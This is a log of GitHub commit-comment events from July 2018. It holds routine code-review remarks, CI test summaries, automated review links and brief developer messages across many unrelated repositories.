{"id":"8020561404","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29838999,"position":5,"line":12,"path":"lib/reducers/indexOf.ts","commit_id":"b472ac08a8618db6c14dec4dcdff8d33f401b30a","created_at":"2018-07-26T05:49:23Z","updated_at":"2018-07-26T05:49:23Z","author_association":"CONTRIBUTOR","body":"And the need for this additional check is just because of the changes in `until` implementation.\r\n`source` is an iterable not an array, therefore `source[index]` most probably will return an undefined value."}},"created_at":"2018-07-26T05:49:23Z"}
{"id":"8020561861","type":"CommitCommentEvent","actor":{"login":"nitin1438"},"repo":{"name":"pixeldustproject-o/android_frameworks_base"},"payload":{"comment":{"id":29839000,"position":null,"line":null,"path":null,"commit_id":"7fd806b87134eaaed71c1406b53e4453dd78c43c","created_at":"2018-07-26T05:49:33Z","updated_at":"2018-07-26T05:49:33Z","author_association":"CONTRIBUTOR","body":"Yeah, exactly!"}},"created_at":"2018-07-26T05:49:33Z"}
{"id":"8020562354","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29839001,"position":null,"line":null,"path":null,"commit_id":"753c45b97a391b05fc27e5fc86f10adc084ac7e8","created_at":"2018-07-26T05:49:45Z","updated_at":"2018-07-26T05:49:45Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - i386-Windows-7-VisualStudio-14: Tests Failed (2358 of 2924 tests passed, 57 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 562 tests had: Table big diffs.\n * 173 tests had: ESO small diffs.\n * 1 test had: BND diffs.\n * 84 tests had: ESO big diffs.\n * 102 tests had: AUD diffs.\n * 39 tests had: MTR big diffs.\n * 105 tests had: MTR small diffs.\n * 25 tests had: ERR diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 57\n * Failed: 566\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.64%25-red.png)</a> \n"}},"created_at":"2018-07-26T05:49:45Z"}
{"id":"8020565997","type":"CommitCommentEvent","actor":{"login":"nandubatchu"},"repo":{"name":"apiaryio/dredd"},"payload":{"comment":{"id":29839009,"position":46,"line":46,"path":"docs/usage-cli.md","commit_id":"7bffde7be6fcaf7c96cf114751dc5fde02b86ac4","created_at":"2018-07-26T05:51:03Z","updated_at":"2018-07-26T05:51:03Z","author_association":"NONE","body":"What in case I am passing the key values with -j flag at startup and not via the config file? "}},"created_at":"2018-07-26T05:51:03Z"}
{"id":"8020568558","type":"CommitCommentEvent","actor":{"login":"jonathan-velez"},"repo":{"name":"jonathan-velez/bpmashup"},"payload":{"comment":{"id":29839010,"position":null,"line":null,"path":null,"commit_id":"1edf4ee03ae852260940a96cdf4d51152bcdac9c","created_at":"2018-07-26T05:51:54Z","updated_at":"2018-07-26T05:51:54Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Love track](https://trello.com/c/jphoqu8U/58-love-track)"}},"created_at":"2018-07-26T05:51:54Z"}
{"id":"8020568700","type":"CommitCommentEvent","actor":{"login":"nik0"},"repo":{"name":"puddly/Main"},"payload":{"comment":{"id":29839011,"position":null,"line":null,"path":null,"commit_id":"381a48bfcd50dc627c3c190e4c67c281f670fe4b","created_at":"2018-07-26T05:51:57Z","updated_at":"2018-07-26T05:51:57Z","author_association":"NONE","body":"I will check this tonight.\r\nDoes the \"fade\" color is working ? I never noticed a difference between setting 0xffffffff and another value. But maybe you did better than me :-)\r\nNo problem to have multiple commits ...\r\n\r\nAlso nice having separated the OSD stuff ...\r\n\r\nThanks !\r\n\r\n"}},"created_at":"2018-07-26T05:51:57Z"}
{"id":"8020569603","type":"CommitCommentEvent","actor":{"login":"samgrande"},"repo":{"name":"DotOS/android_packages_apps_Dialer"},"payload":{"comment":{"id":29839017,"position":null,"line":null,"path":null,"commit_id":"d368a016b5aac3cd9ba57ed13b0dd1f4a5f782f0","created_at":"2018-07-26T05:52:16Z","updated_at":"2018-07-26T05:52:16Z","author_association":"CONTRIBUTOR","body":"Actually I could have changed the bools there too , but i exposed it just to prepare for the dialer dark mode .\r\n\r\nanyway lets move on from the matter , I had no intention to clone that part of code . 👍 \r\n\r\nhttps://github.com/DotOS/android_packages_apps_Dialer/commit/b49adb8908671be88a24374bcb2095b5a1b5252a"}},"created_at":"2018-07-26T05:52:16Z"}
{"id":"8020573708","type":"CommitCommentEvent","actor":{"login":"beiguosanmu9"},"repo":{"name":"beiguosanmu9/hello-world"},"payload":{"comment":{"id":29839020,"position":1,"line":1,"path":"README.md","commit_id":"e719d37f5eee14208d1ee0222f273c7527f5bc78","created_at":"2018-07-26T05:53:43Z","updated_at":"2018-07-26T05:53:43Z","author_association":"OWNER","body":"hi，everyone."}},"created_at":"2018-07-26T05:53:43Z"}
{"id":"8020575171","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29839022,"position":26,"line":26,"path":"test/reducers/min.test.ts","commit_id":"1d097208284ebabb294865b990c8b18e7bfe4508","created_at":"2018-07-26T05:54:15Z","updated_at":"2018-07-26T05:54:15Z","author_association":"CONTRIBUTOR","body":"This test is similar to a test above where it verifies that min on first position is returned.\r\nMaybe switch it on second or another position."}},"created_at":"2018-07-26T05:54:15Z"}
{"id":"8020584032","type":"CommitCommentEvent","actor":{"login":"hackwaly"},"repo":{"name":"egret-labs/egret-core"},"payload":{"comment":{"id":29839029,"position":null,"line":null,"path":null,"commit_id":"9f066e025e3d36546cde459d02b4170f083d62e8","created_at":"2018-07-26T05:57:16Z","updated_at":"2018-07-26T05:57:16Z","author_association":"NONE","body":"Why remove dirty region? Is it performant bad than not do?"}},"created_at":"2018-07-26T05:57:16Z"}
{"id":"8020584844","type":"CommitCommentEvent","actor":{"login":"anselal"},"repo":{"name":"VerTox/asic-monitor"},"payload":{"comment":{"id":29839033,"position":null,"line":null,"path":null,"commit_id":"f1c2db8c3c80e893aff426920d0633c20e59e460","created_at":"2018-07-26T05:57:33Z","updated_at":"2018-07-26T05:57:33Z","author_association":"NONE","body":"You are not supposed to delete my name as an Author nor change the name of the software.\r\nThis is an open source project licensed under GPL"}},"created_at":"2018-07-26T05:57:33Z"}
{"id":"8020585957","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29839035,"position":null,"line":null,"path":null,"commit_id":"d22fbeb64b8cc8711922d4cf92cbd26eb6b02a39","created_at":"2018-07-26T05:57:56Z","updated_at":"2018-07-26T05:57:56Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1223)"}},"created_at":"2018-07-26T05:57:56Z"}
{"id":"8020586298","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":29839037,"position":31,"line":528,"path":"xbmc/filesystem/PluginDirectory.cpp","commit_id":"4c07b52ee24af0f4173cedf93ccc2ef70d3902af","created_at":"2018-07-26T05:58:02Z","updated_at":"2018-07-26T05:58:02Z","author_association":"MEMBER","body":"the meaning of the parameter for busy dialog is different. for busy it means that the dialog will show if action takes longer than 200ms (in this example)\r\nfor progress dialog it means the mail loop gets blocked for 20ms -> not good. busy dialog keeps this parameter private and set to 1 ms"}},"created_at":"2018-07-26T05:58:02Z"}
{"id":"8020586750","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29839039,"position":null,"line":null,"path":null,"commit_id":"4864af8d668f7b4ec759b7688fc4d76d11eaf82f","created_at":"2018-07-26T05:58:12Z","updated_at":"2018-07-26T05:58:12Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1224)"}},"created_at":"2018-07-26T05:58:12Z"}
{"id":"8020587360","type":"CommitCommentEvent","actor":{"login":"dshkol"},"repo":{"name":"mountainMath/cansim"},"payload":{"comment":{"id":29839043,"position":null,"line":null,"path":null,"commit_id":"b203c5b9c2224c427ec35150813670c2710fe124","created_at":"2018-07-26T05:58:24Z","updated_at":"2018-07-26T05:58:24Z","author_association":"COLLABORATOR","body":"Seems to work now. Can we swap it into list_cansim_tables now?"}},"created_at":"2018-07-26T05:58:24Z"}
{"id":"8020589541","type":"CommitCommentEvent","actor":{"login":"ImYoungUn"},"repo":{"name":"sshrik/SixthStone"},"payload":{"comment":{"id":29839046,"position":null,"line":null,"path":null,"commit_id":"6c7dd7f7503af53c133cf519a1994e7fc250d6ff","created_at":"2018-07-26T05:59:10Z","updated_at":"2018-07-26T05:59:10Z","author_association":"NONE","body":"코드가 아주 깔끔하고 좋네요"}},"created_at":"2018-07-26T05:59:10Z"}
{"id":"8020590150","type":"CommitCommentEvent","actor":{"login":"dojo-json"},"repo":{"name":"CodingDojo-MEAN-02-17/JeremyFederMEAN"},"payload":{"comment":{"id":29839047,"position":null,"line":null,"path":null,"commit_id":"bcf613ec106f28689e4dbb576a80e9bf805ed1f1","created_at":"2018-07-26T05:59:21Z","updated_at":"2018-07-26T05:59:21Z","author_association":"NONE","body":"Typically you want to include the `package-lock.json` in your version control. I have come across reasons to temporarily delete it, but it is best to be committed. "}},"created_at":"2018-07-26T05:59:21Z"}
{"id":"8020590876","type":"CommitCommentEvent","actor":{"login":"samfoong"},"repo":{"name":"Thebeleiver1/eric-ribeiro"},"payload":{"comment":{"id":29839048,"position":null,"line":null,"path":null,"commit_id":"c2720d38c55c1b6c74c4702407dea0459f1456c2","created_at":"2018-07-26T05:59:36Z","updated_at":"2018-07-26T05:59:36Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-26T05:59:36Z"}
{"id":"8020591272","type":"CommitCommentEvent","actor":{"login":"mountainMath"},"repo":{"name":"mountainMath/cansim"},"payload":{"comment":{"id":29839049,"position":null,"line":null,"path":null,"commit_id":"b203c5b9c2224c427ec35150813670c2710fe124","created_at":"2018-07-26T05:59:44Z","updated_at":"2018-07-26T05:59:44Z","author_association":"OWNER","body":"The two tables have different formats. We should first go through this and maybe make the existing column names match. And keep the extra ones, like tags and such. That way it causes minimal disruption."}},"created_at":"2018-07-26T05:59:44Z"}
{"id":"8020591394","type":"CommitCommentEvent","actor":{"login":"error2507"},"repo":{"name":"ReloadedDevs/Rex"},"payload":{"comment":{"id":29839051,"position":null,"line":null,"path":null,"commit_id":"acb70d86ce02d116be2ac5faf230c9a874855934","created_at":"2018-07-26T05:59:47Z","updated_at":"2018-07-26T05:59:47Z","author_association":"CONTRIBUTOR","body":"Fixed debug mode on/off"}},"created_at":"2018-07-26T05:59:47Z"}
{"id":"8020592195","type":"CommitCommentEvent","actor":{"login":"Nhowka"},"repo":{"name":"Zaid-Ajaj/tabula-rasa"},"payload":{"comment":{"id":29839054,"position":27,"line":73,"path":"Client/src/App/Admin/Backoffice/NewArticle/State.fs","commit_id":"971f69b3d51a6bfed088ae724c247f06e23b1c61","created_at":"2018-07-26T06:00:04Z","updated_at":"2018-07-26T06:00:04Z","author_association":"NONE","body":"This is good for teaching purposes but highly optional. The server already knows when a post is published, so it can send a message directly to the postsHub. That way the client can just receive messages from the server when needed without sending anything."}},"created_at":"2018-07-26T06:00:04Z"}
{"id":"8020593827","type":"CommitCommentEvent","actor":{"login":"jstray"},"repo":{"name":"CJWorkbench/cjworkbench"},"payload":{"comment":{"id":29839064,"position":30,"line":25,"path":"server/views/workflows.py","commit_id":"a64356355c529e1cfd68151bb8d59cd2614d39ba","created_at":"2018-07-26T06:00:31Z","updated_at":"2018-07-26T06:00:31Z","author_association":"COLLABORATOR","body":"There is information in here table that is not in the main module table: the reorder module can be added by a table edit,  but does not appear in the module menu because it has no UI in the stack. I added a comment to this effect."}},"created_at":"2018-07-26T06:00:31Z"}
{"id":"8020596615","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29839073,"position":5,"line":34,"path":"lib/iterators/skip.ts","commit_id":"eadda18c087b4f8498d54283af2d929ef1ca9669","created_at":"2018-07-26T06:01:24Z","updated_at":"2018-07-26T06:01:24Z","author_association":"CONTRIBUTOR","body":"Suspicious change.\r\nPlease cover with a test for `skip(source, -1)` to ensure it properly works."}},"created_at":"2018-07-26T06:01:24Z"}
{"id":"8020597359","type":"CommitCommentEvent","actor":{"login":"hana0524"},"repo":{"name":"hana0524/sample"},"payload":{"comment":{"id":29839074,"position":3,"line":1,"path":"README.md","commit_id":"31d820b6b6654b2332ba44669814005e05cc268c","created_at":"2018-07-26T06:01:38Z","updated_at":"2018-07-26T06:01:38Z","author_association":"OWNER","body":"g"}},"created_at":"2018-07-26T06:01:38Z"}
{"id":"8020598771","type":"CommitCommentEvent","actor":{"login":"hana0524"},"repo":{"name":"hana0524/sample"},"payload":{"comment":{"id":29839079,"position":5,"line":3,"path":"README.md","commit_id":"31d820b6b6654b2332ba44669814005e05cc268c","created_at":"2018-07-26T06:02:07Z","updated_at":"2018-07-26T06:02:07Z","author_association":"OWNER","body":"h"}},"created_at":"2018-07-26T06:02:07Z"}
{"id":"8020600186","type":"CommitCommentEvent","actor":{"login":"mahdif60"},"repo":{"name":"mahdif60/Test"},"payload":{"comment":{"id":29839082,"position":null,"line":null,"path":null,"commit_id":"1383fa541810bc66f289a261d05596fb8ce71daf","created_at":"2018-07-26T06:02:35Z","updated_at":"2018-07-26T06:02:35Z","author_association":"OWNER","body":"I still dont know how it works"}},"created_at":"2018-07-26T06:02:35Z"}
{"id":"8020607086","type":"CommitCommentEvent","actor":{"login":"pepakriz"},"repo":{"name":"pepakriz/phpstan-exception-rules"},"payload":{"comment":{"id":29839089,"position":null,"line":null,"path":null,"commit_id":"461c803a7aa1a4b7303c6bd43c533d83c72a1de6","created_at":"2018-07-26T06:04:47Z","updated_at":"2018-07-26T06:04:47Z","author_association":"OWNER","body":"Hi, I absolutely understand the problem you described. The main reason why I removed this feature is when you say `@throws RuntimeException`, it can throws `RuntimeException` which is checked, but can throws `Nette\\InvalidStateException` too. In this case is everything ok, but in opposite way when ho have `@throws LogicException` as unchecked, it could throws `SomeMyCheckedLogicException` and you have a problem - analysis will process it as unchecked. Maybe I can bring blacklist back, but there must be some validation that you want to ignore checked subtype and list of checkedExceptions does not contain blacklisted exception."}},"created_at":"2018-07-26T06:04:47Z"}
{"id":"8020612107","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29839094,"position":null,"line":null,"path":null,"commit_id":"460e5e8348034c0125ee26a201b0edb3d1c507f1","created_at":"2018-07-26T06:06:22Z","updated_at":"2018-07-26T06:06:22Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1225)"}},"created_at":"2018-07-26T06:06:22Z"}
{"id":"8020612244","type":"CommitCommentEvent","actor":{"login":"genroberson86"},"repo":{"name":"genroberson86/orie-"},"payload":{"comment":{"id":29839095,"position":null,"line":null,"path":null,"commit_id":"a9e4d79b707551c1e0ac4d32320e513a5f32d322","created_at":"2018-07-26T06:06:25Z","updated_at":"2018-07-26T06:06:25Z","author_association":"OWNER","body":"weeeeeeeee"}},"created_at":"2018-07-26T06:06:25Z"}
{"id":"8020612908","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29839098,"position":null,"line":null,"path":null,"commit_id":"87bb6f8f047e666baeaf034f5017f3d2aef3da95","created_at":"2018-07-26T06:06:36Z","updated_at":"2018-07-26T06:06:36Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1226)"}},"created_at":"2018-07-26T06:06:36Z"}
{"id":"8020613834","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29839101,"position":null,"line":null,"path":null,"commit_id":"8ebe3240de29c4c843fd1a0536d7a6372430c9e2","created_at":"2018-07-26T06:06:54Z","updated_at":"2018-07-26T06:06:54Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1227)"}},"created_at":"2018-07-26T06:06:54Z"}
{"id":"8020614140","type":"CommitCommentEvent","actor":{"login":"ajsabandal"},"repo":{"name":"ajsabandal/aj-sdrawing"},"payload":{"comment":{"id":29839102,"position":null,"line":null,"path":null,"commit_id":"e316898739b99231f6f3c1e25b09b6a67cc49cc8","created_at":"2018-07-26T06:07:00Z","updated_at":"2018-07-26T06:07:00Z","author_association":"OWNER","body":"fdf"}},"created_at":"2018-07-26T06:07:00Z"}
{"id":"8020618038","type":"CommitCommentEvent","actor":{"login":"scamille"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29839113,"position":null,"line":null,"path":null,"commit_id":"3a1bae2b3457c7234f45d9134d3449cd2c1fe51a","created_at":"2018-07-26T06:08:13Z","updated_at":"2018-07-26T06:08:13Z","author_association":"MEMBER","body":"How about some comments here for such special cases? See https://github.com/simulationcraft/simc/wiki/CodingGuidelines\r\n\r\nIf available you can also add a WoW-BugTracker link/id and a as usual date of finding/confirmation and source/author."}},"created_at":"2018-07-26T06:08:13Z"}
{"id":"8020622149","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29839122,"position":null,"line":null,"path":null,"commit_id":"b41c311ffc42761ff867113e31e5fb7fa7d014a5","created_at":"2018-07-26T06:09:28Z","updated_at":"2018-07-26T06:09:28Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1229)"}},"created_at":"2018-07-26T06:09:28Z"}
{"id":"8020622624","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29839123,"position":null,"line":null,"path":null,"commit_id":"6c8a47ebdf2d1c1693286258f97b1b173224db36","created_at":"2018-07-26T06:09:37Z","updated_at":"2018-07-26T06:09:37Z","author_association":"COLLABORATOR","body":":+1: "}},"created_at":"2018-07-26T06:09:37Z"}
{"id":"8020622968","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29839124,"position":null,"line":null,"path":null,"commit_id":"00a74c21fa16650b690f4751465a2ab54fc48e02","created_at":"2018-07-26T06:09:43Z","updated_at":"2018-07-26T06:09:43Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1230)"}},"created_at":"2018-07-26T06:09:43Z"}
{"id":"8020631777","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29839138,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-26T06:12:25Z","updated_at":"2018-07-26T06:12:25Z","author_association":"COLLABORATOR","body":"Thx @bakersdozen . But what is linear Rec709?! Rec709 is all but not linear... :-D To see the difference, check out latest MLVApp and switch between Rec709 and linear. That is very different."}},"created_at":"2018-07-26T06:12:25Z"}
{"id":"8020632440","type":"CommitCommentEvent","actor":{"login":"Mornsplendor"},"repo":{"name":"Mornsplendor/Iteration-Double-Auction"},"payload":{"comment":{"id":29839141,"position":null,"line":null,"path":null,"commit_id":"7967b501d0bde6af13e35723aeffc12587054c41","created_at":"2018-07-26T06:12:38Z","updated_at":"2018-07-26T06:12:38Z","author_association":"OWNER","body":"语言Matlab"}},"created_at":"2018-07-26T06:12:38Z"}
{"id":"8020643239","type":"CommitCommentEvent","actor":{"login":"yahonda"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":29839170,"position":4,"line":108,"path":"actionpack/test/dispatch/header_test.rb","commit_id":"91fd679710118482f718ea710710561f1cfb0b70","created_at":"2018-07-26T06:16:02Z","updated_at":"2018-07-26T06:16:02Z","author_association":"CONTRIBUTOR","body":"I prefer this `rubocop:disable` comment is not included in the ruby application and test code. How about excluding this file by updating rubocop.yml file?"}},"created_at":"2018-07-26T06:16:02Z"}
{"id":"8020645480","type":"CommitCommentEvent","actor":{"login":"sangyeonK"},"repo":{"name":"Nexters/DeepDeepSea"},"payload":{"comment":{"id":29839175,"position":48,"line":113,"path":"Assets/Scripts/Character.cs","commit_id":"cac09f8ed9e3863263cf501b649a7f8c50b7a30c","created_at":"2018-07-26T06:16:43Z","updated_at":"2018-07-26T06:16:43Z","author_association":"CONTRIBUTOR","body":"unity의 MonoBehaviour.OnTriggerEnter2D(Collider2D) 를 사용하려면 private 으로 지정되어야 될 것 같습니다."}},"created_at":"2018-07-26T06:16:43Z"}
{"id":"8020645822","type":"CommitCommentEvent","actor":{"login":"akshaysonavane"},"repo":{"name":"7020376200/Programming_Languages"},"payload":{"comment":{"id":29839178,"position":null,"line":null,"path":null,"commit_id":"716c9cc295297ed8fe07b0f2f8049ada3bc49c4f","created_at":"2018-07-26T06:16:50Z","updated_at":"2018-07-26T06:16:50Z","author_association":"NONE","body":"ok fine "}},"created_at":"2018-07-26T06:16:50Z"}
{"id":"8020653639","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29839202,"position":null,"line":null,"path":null,"commit_id":"50540416f4a81184e9858c15a6f763d727e4feb6","created_at":"2018-07-26T06:19:11Z","updated_at":"2018-07-26T06:19:11Z","author_association":"NONE","body":"hey this is my territory @GodlyFoox >:((((((((((((((((((("}},"created_at":"2018-07-26T06:19:11Z"}
{"id":"8020656425","type":"CommitCommentEvent","actor":{"login":"kennyluuu"},"repo":{"name":"kennyluuu/hello-world"},"payload":{"comment":{"id":29839215,"position":3,"line":2,"path":"README.md","commit_id":"e3346f8bbda8fa5dd4dadf7c1852445748bc1c83","created_at":"2018-07-26T06:20:03Z","updated_at":"2018-07-26T06:20:03Z","author_association":"OWNER","body":"First day to learn how to use the git and github."}},"created_at":"2018-07-26T06:20:03Z"}
{"id":"8020657582","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29839217,"position":null,"line":null,"path":null,"commit_id":"50540416f4a81184e9858c15a6f763d727e4feb6","created_at":"2018-07-26T06:20:22Z","updated_at":"2018-07-26T06:20:22Z","author_association":"CONTRIBUTOR","body":"despacitos welcomed with open arms"}},"created_at":"2018-07-26T06:20:22Z"}
{"id":"8020663294","type":"CommitCommentEvent","actor":{"login":"puddly"},"repo":{"name":"puddly/Main"},"payload":{"comment":{"id":29839223,"position":null,"line":null,"path":null,"commit_id":"381a48bfcd50dc627c3c190e4c67c281f670fe4b","created_at":"2018-07-26T06:22:04Z","updated_at":"2018-07-26T06:22:04Z","author_association":"OWNER","body":"I haven't checked how the IMP functions handle alpha blending but the results are good enough. Applying `sqrt` to the alpha channel produces nicer text at small sizes so maybe getting access to the raw image data and doing alpha blending outside of the IMP functions might produce better results. "}},"created_at":"2018-07-26T06:22:04Z"}
{"id":"8020664566","type":"CommitCommentEvent","actor":{"login":"ceciliachoi"},"repo":{"name":"ceciliachoi/SecureGateway"},"payload":{"comment":{"id":29839226,"position":null,"line":null,"path":null,"commit_id":"21bf89fae01ec31bdb7de21e0315af7b06e95218","created_at":"2018-07-26T06:22:25Z","updated_at":"2018-07-26T06:22:25Z","author_association":"OWNER","body":"@sidbalu7 \r\nThank you for pointing that, I've submitted the correct one:\r\nhttps://github.com/ceciliachoi/SecureGateway/commit/de75fa4491f90d183f344942210f830202b874d1\r\n\r\nI think what Lindsey's mention is the field we can see in the SG gateway UI:\r\n<img width=\"398\" alt=\"screen shot 2018-07-26 at 2 17 33 pm\" src=\"https://user-images.githubusercontent.com/41613417/43244871-e8971714-90de-11e8-94ad-5f3bd5115976.png\">\r\nCustomer can get the hostname of the node which need to export port 9000, we don't need to list all hostname in our public document.\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-26T06:22:25Z"}
{"id":"8020665857","type":"CommitCommentEvent","actor":{"login":"MBA1376"},"repo":{"name":"MBA1376/node-course-2-todo-api"},"payload":{"comment":{"id":29839230,"position":null,"line":null,"path":null,"commit_id":"8ac45893af59d97cde824a9345510036d570cf87","created_at":"2018-07-26T06:22:45Z","updated_at":"2018-07-26T06:22:45Z","author_association":"OWNER","body":"delete in mongodb (MongoClient) "}},"created_at":"2018-07-26T06:22:45Z"}
{"id":"8020689115","type":"CommitCommentEvent","actor":{"login":"xujin"},"repo":{"name":"ruslanskorb/RSKImageCropper"},"payload":{"comment":{"id":29839259,"position":null,"line":null,"path":null,"commit_id":"824d52e250f5782b5e9445e2b849193fdc18862e","created_at":"2018-07-26T06:29:37Z","updated_at":"2018-07-26T06:29:37Z","author_association":"NONE","body":"Need to make judgment here to prevent the program from crashing\r\n"}},"created_at":"2018-07-26T06:29:37Z"}
{"id":"8020690162","type":"CommitCommentEvent","actor":{"login":"JeyaNachiaban"},"repo":{"name":"JeyaNachiaban/POC-FINAL"},"payload":{"comment":{"id":29839260,"position":null,"line":null,"path":null,"commit_id":"f54a807c5f64eecb683d1a3825bead14d14257a8","created_at":"2018-07-26T06:29:54Z","updated_at":"2018-07-26T06:29:54Z","author_association":"OWNER","body":"Updated v2 of front ned code"}},"created_at":"2018-07-26T06:29:54Z"}
{"id":"8020690706","type":"CommitCommentEvent","actor":{"login":"MBA1376"},"repo":{"name":"MBA1376/node-course-2-todo-api"},"payload":{"comment":{"id":29839261,"position":null,"line":null,"path":null,"commit_id":"8ac45893af59d97cde824a9345510036d570cf87","created_at":"2018-07-26T06:30:03Z","updated_at":"2018-07-26T06:30:03Z","author_association":"OWNER","body":"first that try to connect to mongodb and then call the callback and the callback return (err , db) \r\n\r\n> db access to collection and collection access to functions  ( delete insert update read)"}},"created_at":"2018-07-26T06:30:03Z"}
{"id":"8020693150","type":"CommitCommentEvent","actor":{"login":"birjolaxew"},"repo":{"name":"simple-icons/simple-icons"},"payload":{"comment":{"id":29839268,"position":null,"line":null,"path":null,"commit_id":"d5585894dfe1e37db75889aa084c195d8d375f0c","created_at":"2018-07-26T06:30:41Z","updated_at":"2018-07-26T06:30:41Z","author_association":"MEMBER","body":"@RedSparr0w Can you please open an issue with a description of the problem?"}},"created_at":"2018-07-26T06:30:41Z"}
{"id":"8020694901","type":"CommitCommentEvent","actor":{"login":"bakersdozen"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29839272,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-26T06:31:13Z","updated_at":"2018-07-26T06:31:13Z","author_association":"NONE","body":"I know it's different, but I just thought you may glean some clues from the luts as you have with the others. I'm not quite sure what linear rec709 is myself. Colorspace can get pretty overwhelming haha"}},"created_at":"2018-07-26T06:31:13Z"}
{"id":"8020695560","type":"CommitCommentEvent","actor":{"login":"jmarais"},"repo":{"name":"jmarais/protobuf-1"},"payload":{"comment":{"id":29839273,"position":null,"line":null,"path":null,"commit_id":"b0e1c3ce4e876c41eb22fd16e83089826845de8a","created_at":"2018-07-26T06:31:24Z","updated_at":"2018-07-26T06:31:24Z","author_association":"OWNER","body":"Thats fine. Thanks for the heads-up\n\nOn Tue, Jul 24, 2018 at 10:38 PM, Joe Tsai <notifications@github.com> wrote:\n\n> We're going to have to revert this change. This is breaking a lot of\n> targets that use SetDeterministic along with custom marshalers (where all\n> the custom marshalers were already deterministic). I think we will have to\n> go with the position that custom marshalers are most likely deterministic\n> and if they aren't, well, bleh. The situation is unfortunate.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jmarais/protobuf-1/commit/b0e1c3ce4e876c41eb22fd16e83089826845de8a#commitcomment-29819705>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB0VLurQ0uru1Evdc5lq3MXxP8zZTV78ks5uJ4XDgaJpZM4VeX2L>\n> .\n>\n"}},"created_at":"2018-07-26T06:31:24Z"}
{"id":"8020702587","type":"CommitCommentEvent","actor":{"login":"MBA1376"},"repo":{"name":"MBA1376/node-course-2-todo-api"},"payload":{"comment":{"id":29839280,"position":null,"line":null,"path":null,"commit_id":"8ac45893af59d97cde824a9345510036d570cf87","created_at":"2018-07-26T06:33:29Z","updated_at":"2018-07-26T06:33:29Z","author_association":"OWNER","body":"delete in mongodb( MongoClient)\r\n1: deleteMany\r\n2:deleteOne\r\n3:findOneAndDelete"}},"created_at":"2018-07-26T06:33:29Z"}
{"id":"8020706307","type":"CommitCommentEvent","actor":{"login":"shashikolakar"},"repo":{"name":"shashikolakar/git-github"},"payload":{"comment":{"id":29839284,"position":null,"line":null,"path":null,"commit_id":"6dae923485afe0df86bddba8eaf141a7787ecc77","created_at":"2018-07-26T06:34:33Z","updated_at":"2018-07-26T06:34:33Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-26T06:34:33Z"}
